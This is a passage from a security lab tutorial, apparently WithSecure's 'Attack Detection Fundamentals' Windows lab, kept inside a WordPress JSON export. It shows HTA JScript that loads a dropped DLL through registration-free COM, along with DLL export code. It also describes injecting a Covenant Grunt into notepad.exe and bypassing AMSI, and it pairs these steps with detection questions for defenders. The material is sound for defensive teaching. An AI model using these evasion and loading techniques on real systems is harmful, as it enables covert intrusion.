A few examples could include:<\/p>\n<ul>\n<li>A file with a DLL extension was written to disk by a known LOLBin (&#x27;Mshta.exe&#x27;): could you tell how frequently that happens in your environment?<\/li>\n<li>A base64 PE was embedded in an HTA; we did not mention how to actually send the HTA to the victim, but potentially a proxy would have visibility over the files downloaded from the internet. Is there an automated way of blocking\/alerting on this type of event?<\/li>\n<li>The DLL will call the CreateRemoteThread API, widely used by malware. Does your EDR\/AV prevent or detect its usage? Would it be possible for you to have the raw telemetry and eventually build detections around it?<\/li>\n<\/ul>\n<p>Now that we have an HTA that can drop a DLL to disk, we need a way of actually getting that DLL loaded somewhere. To do so there are multiple options, such as DLL sideloading or using &#x27;rundll32&#x27; to manually load the library. However, in this example we will use something a bit more complex.<\/p>\n<p>Leo Loobeek&#x27;s research <a href=\"https:\/\/adapt-and-attack.com\/2020\/05\/12\/building-a-com-server-for-initial-execution\/\" target=\"_blank\" rel=\"noopener\">&quot;Building a COM Server for Initial Execution&quot;<\/a> demonstrates how it is possible to load arbitrary DLLs using Registration Free COM. We don&#x27;t need to go into the details of COM, but in general a COM object needs to be registered on the system in order to be accessed. 
However, a particular COM object, ActCtx, can be used to access a COM object without registration on the system, by simply specifying what is called a &quot;manifest&quot;.<\/p>\n<p>We can add the following code to our HTA to do so, following Leo&#x27;s <a href=\"https:\/\/gist.github.com\/leoloobeek\/86ffb76511e3a2e98c5d922501b70b3e\" target=\"_blank\" rel=\"noopener\">example<\/a>:<\/p>\n<pre><code class=\"language-bash\">var manifestXML = &#x27;&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot; standalone=&quot;yes&quot;?&gt;&lt;assembly xmlns=&quot;urn:schemas-microsoft-com:asm.v1&quot; manifestVersion=&quot;1.0&quot;&gt;&lt;assemblyIdentity type=&quot;win32&quot; name=&quot;MyCOMObject&quot; version=&quot;2.2.0.0&quot;\/&gt; &lt;file name=&quot;test.dll&quot;&gt; &lt;comClass description=&quot;MyCOMObject Class&quot; clsid=&quot;{67E11FF1-C068-4C48-A1F5-69A882E0E99A}&quot; threadingModel=&quot;Both&quot; progid=&quot;MyCOMObject&quot;\/&gt;&lt;\/file&gt;&lt;\/assembly&gt;&#x27;\n\n\/\/ this will look for our COM DLL in the path noted above, the file name is indicated in the manifest\nshell.Environment(&#x27;Process&#x27;)(&#x27;TMP&#x27;) = path;\n\nvar actCtx = new ActiveXObject(&quot;Microsoft.Windows.ActCtx&quot;);\nactCtx.ManifestText = manifestXML;\n\ntry {\nvar dwx = actCtx.CreateObject(&quot;MyCOMObject&quot;);\nalert();\n} catch (e) { }<\/code><\/pre>\n<p>To make this work for us, we also need to modify our DLL to export specific functions, necessary for the reg-free COM activation. 
More specifically, the following code should be added into our DLL:<\/p>\n<pre><code class=\"language-bash\">\/\/ build and place in directory specified in the script.js file\n\/\/ need to export DllCanUnloadNow, DllRegisterServer, DllUnregisterServer, DllGetClassObject\n#include &lt;Windows.h&gt;\n#include &lt;comutil.h&gt; \/\/ #include for _bstr_t\n#include &lt;string&gt;\n#include &quot;Data.h&quot;\n\nDWORD MyThread();\nUINT g_uThreadFinished;\nextern UINT g_uThreadFinished;\n\nBOOL APIENTRY DllMain(HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)\n{\nif (ul_reason_for_call == DLL_PROCESS_ATTACH)\n{\ng_uThreadFinished = 0;\n}\nreturn TRUE;\n}\n\nSTDAPI DllCanUnloadNow(void)\n{\n\/\/ Ensure our thread can finish before we&#x27;re unloaded\ndo\n{\nSleep(1);\n} while (g_uThreadFinished == 0);\n\nreturn S_OK;\n}\n\nSTDAPI DllRegisterServer(void)\n{\nreturn S_OK;\n}\n\nSTDAPI DllUnregisterServer(void)\n{\nreturn S_OK;\n}\n\nSTDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID* ppv)\n{\nCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MyThread, NULL, 0, NULL);\nreturn CLASS_E_CLASSNOTAVAILABLE;\n}<\/code><\/pre>\n<p>To recap what is happening, our HTA will do the following:<\/p>\n<ul>\n<li>Drop a DLL in a folder we specify, something like %TEMP or %APPDATA%<\/li>\n<li>The HTA will define an XML manifest, that will be dropped in the same folder as our DLL<\/li>\n<li>Using registration free COM, we will load the DLL into the mshta.exe process<\/li>\n<li>The DLL will perform process injection against notepad.exe<\/li>\n<li>Notepad will spawn a Covenant&#x27;s Grunt<\/li>\n<\/ul>\n<p>If we try to execute our HTA and monitor the process activity using tools such as <a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/procmon\" target=\"_blank\" rel=\"noopener\">ProcMon<\/a>, it would be possible to see a &quot;Load Image&quot; event using our DLL, and we should obtain an active Grunt on the host:<\/p>\n<figure><img decoding=\"async\" 
src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210325154234265.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h2>Conclusions<\/h2>\n<p>Let&#x27;s take a minute: we&#x27;ve come a long way!<\/p>\n<p>In this lab, we&#x27;ve observed AMSI doing its thing against our default Covenant Grunt shellcode. We&#x27;ve used the Donut project to introduce an AMSI bypass and get around this. From here, we&#x27;ve embedded our shellcode in a DLL that spawns a Notepad process and uses the VirtualAllocEx-&gt;WriteProcessMemory-&gt;CreateRemoteThread pattern to inject our Grunt.<\/p>\n<p>We&#x27;ve used FireEye&#x27;s CAPA to give us some idea of how glaringly obvious our malicious payload is, highlighting the many &#x27;opsec fails&#x27; that static analysis quickly picks up. We&#x27;ve even seen how Sysmon includes a specific event ID just for our CreateRemoteThread injection technique!<\/p>\n<p>To stand a better chance of delivering our payload into a target environment, we&#x27;ve embedded the base64-encoded DLL into an HTA file that subsequently decodes the encoded blob in memory and drops it to disk (highlighting another detection opportunity using &#x27;file creation&#x27; events). To execute our DLL from the HTA, we used Leo Loobeek&#x27;s research into Registration Free COM, including a reference to our Grunt-packed DLL in the HTA file&#x27;s manifest.<\/p>\n<p>We&#x27;ve still got plenty to do if we want our payload to have a better chance of bypassing security controls and executing successfully. 
Join us in the next guide as we implement API unhooking and patch ETW <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-2\/\" target=\"_blank\" rel=\"noopener\">here<\/a>!<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: Windows &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    
class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/darkgate-rises\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>One of the core concepts of the first workshop was &#8220;Defense Evasion&#8221; geared towards &#8220;Initial Access&#8221;. 
In this lab, we are going to build an initial access payload able to evade the most common endpoint protection mechanisms.<\/p>\n","protected":false},"author":3,"featured_media":8858,"template":"","categories":[240,271,231],"labs_content_type":[296],"class_list":["post-7736","lab_item","type-lab_item","status-publish","has-post-thumbnail","hentry","category-attack-detection","category-offensive-security","category-software-protection"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research.jpg 1200w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-300x200.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-1024x683.jpg 1024w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-768x512.jpg 768w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-447x298.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-219x146.jpg 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span 
class=\"wp-component-card-insight__category\">Offensive security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals 2021: Windows &#8211; Lab #1<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">One of the core concepts of the first workshop was &quot;Defense Evasion&quot; geared towards &quot;Initial Access&quot;. In this lab, we are going to build an initial access payload able to evade the most common endpoint protection mechanisms.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/\">Read more<\/a>            <\/div>\n            
<\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/lab_item\/7736","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/users\/3"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/media\/8858"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/media?parent=7736"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/categories?post=7736"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/labs_content_type?post=7736"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}